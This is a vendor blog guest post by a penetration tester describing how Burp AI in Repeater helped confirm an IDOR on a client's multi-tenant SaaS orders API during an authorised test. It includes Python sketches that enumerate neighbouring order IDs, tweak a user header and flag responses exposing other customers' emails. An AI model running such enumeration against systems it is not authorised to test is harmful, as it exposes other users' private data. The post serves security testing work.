Hassan Ud-Deen | 22 January 2026 at 15:18 UTC
Note: This is a guest post by IT security consultant Adarsh Kumar.
I’ve been using Burp Suite day to day for years, so when Burp AI was introduced, I was curious how it would actually hold up during real engagements.
I’ve used it across live tests, not as a replacement for manual testing, but as a way to speed up exploration and surface ideas I might not otherwise have thought of until later. This post walks through one concrete example of how Burp AI fit into my Repeater workflow and where it genuinely helped.
Same workflow, better results
Repeater is where I spend most of my time during an engagement. A significant part of any pentest is replaying requests, changing one thing at a time, and watching how the app reacts. Conveniently, that’s also where Burp AI comes in.
I love that I’m able to invoke Burp AI directly from Repeater without breaking my normal workflow. I use it to get fresh test ideas, tweak payloads, and catch things I might otherwise miss after replaying the same request for the tenth time and starting to second-guess myself.
It feels like collaborating with another pentester. It doesn’t do the thinking for me, but it helps me move faster through the repetitive parts and get to the interesting behaviour sooner. This is exactly what happened in a recent client engagement during a time-boxed application test.
Quickly validating an IDOR on a multi-tenant SaaS app
The target was a SaaS platform used by multiple customer accounts, with user dashboards, a REST API, and token-based authentication. Access control issues were high impact in this context, as different customers’ data lived behind the same API surface.
I was testing the endpoint GET /api/orders/{orderId} in Repeater. The auth looked fine when I used my account, but the app returned different fields depending on the orderId.
I often come across leads like this, but there’s typically not enough time to pursue each and every one of them. I needed to quickly decide whether to dig deeper or move on to other areas.
I copied one of the successful requests into Repeater and highlighted the orderId path segment, along with a response field containing customerEmail.
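For readers who want something concrete, here’s roughly what that baseline request looked like reproduced outside Burp. This is a minimal sketch with invented placeholders: the host, token, orderId, and field values are mine for illustration, not the client’s real details.

```python
# Minimal sketch of the baseline request, reproduced outside Burp.
# The host, token, and orderId below are invented placeholders.
import requests

BASE_URL = "https://app.example.com"   # placeholder for the client's API host
TOKEN = "eyJ..."                       # my own account's bearer token
ORDER_ID = "10234"                     # an orderId my account can legitimately read

resp = requests.get(
    f"{BASE_URL}/api/orders/{ORDER_ID}",
    headers={"Authorization": f"Bearer {TOKEN}"},
    timeout=10,
)
print(resp.status_code)
print(resp.json().get("customerEmail"))  # the response field I highlighted
```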
From Repeater, I opened Burp AI and asked:
“Based on this request and response, can you suggest concrete tests to verify whether access controls are enforced correctly on this endpoint?”
Burp AI came back with a short, practical plan based on the selected request and response. It suggested trying IDs around the original value, testing different ID formats, tweaking a user-related header, and watching for response differences tied to other accounts.
It also gave me a list of different IDs to test and called out that some requests would probably return 404s, which helped separate normal behaviour from genuine access control problems.
Figure 1: Burp AI suggesting quick, targeted tests (example)
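To give a feel for the plan, here’s a rough sketch of those suggestions as a standalone script, reusing the invented placeholders from above. In practice I replayed everything through Repeater and Intruder; the exact ID formats and header value here are my own illustrative guesses, not a transcript of Burp AI’s output.

```python
# Rough sketch of the suggested tests: IDs around the original value,
# a few alternative formats, a user-related header tweak, and 404
# filtering to separate normal noise from real access control issues.
# All values are invented placeholders.
import requests

BASE_URL = "https://app.example.com"
TOKEN = "eyJ..."
ORDER_ID = 10234

# Neighbouring IDs plus a few alternative encodings of the original.
candidates = [str(ORDER_ID + d) for d in range(-5, 6) if d != 0]
candidates += [f"{ORDER_ID:08d}", hex(ORDER_ID), f"ORD-{ORDER_ID}"]

for oid in candidates:
    resp = requests.get(
        f"{BASE_URL}/api/orders/{oid}",
        headers={
            "Authorization": f"Bearer {TOKEN}",
            "X-Client-User": "1001",  # the user-related header the AI flagged
        },
        timeout=10,
    )
    if resp.status_code == 404:
        continue  # expected noise for non-existent orders
    print(oid, resp.status_code, resp.text[:120])
```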
I then sent the AI-generated ID list straight back into Repeater, tweaked a header the AI had flagged (X-Client-User), and replayed the requests. One of those requests returned a payload containing another user’s invoice details, which confirmed the IDOR.
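The rule that separated that confirming response from the noise is simple enough to write down. Again, a hypothetical sketch: tester@example.com stands in for the email tied to my test account, and the field name comes from the response I’d highlighted earlier.

```python
# Hypothetical triage check: a 200 response whose customerEmail isn't
# tied to my own test account is a likely IDOR hit worth verifying manually.
def looks_like_idor(response, my_email="tester@example.com"):
    if response.status_code != 200:
        return False
    email = response.json().get("customerEmail")
    return email is not None and email != my_email
```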
Confirming this exploit quickly was key during the engagement. Once the IDOR was verified, I could immediately assess impact, expand testing to similar endpoints, and document a clear, reproducible proof of concept for the client.
Without that early confirmation, this could easily have turned into a longer manual exploration to reach the same result. Or even worse, I might’ve moved on to something else after a while, potentially leaving a high-severity bug behind in the process.
How Burp AI accelerates my Repeater workflow
Before: Repeater → manual guessing → grunt work to craft multiple variants → slow confirmation.
After: Repeater → quick AI prompt → get a short, sensible plan + a few concrete variants → push the ones that matter back into Repeater/Intruder → manual verification and exploitation.
For me, the net effect is less time on setup and more time thinking about what the responses actually mean, how far an issue goes, and how to explain it clearly to a client.
Thanks to Burp AI in Repeater, I get to spend more time on the aspects of a test that matter, because it handles tasks like:
- Suggesting different payloads and test ideas in seconds.
- Flagging weird responses or patterns I might overlook.
- Helping mutate headers, parameters, or JSON fields quickly.
- Generating quick test sequences or lists of values for me to try.
- Giving plain-language explanations of unexpected server behaviour.
- Letting me send AI-suggested requests straight back into Repeater or Intruder.
Taken together, this shaved a noticeable amount of time off the workflow: on this single endpoint alone, Burp AI probably saved me around 20 minutes by surfacing payload variations, header mutations, and response patterns I would normally work through manually.
More importantly, it helped me reach a confident conclusion faster, which let me spend the remaining time testing related endpoints and validating overall impact.
For me, Burp AI speeds up the dull parts and gives me a second perspective when I’m stuck. It doesn’t replace the careful thinking a real pentester brings when chaining issues together and judging impact. What it gives me is cleaner iteration, more angles to try, and the odd suggestion I hadn’t thought of after three cups of coffee.

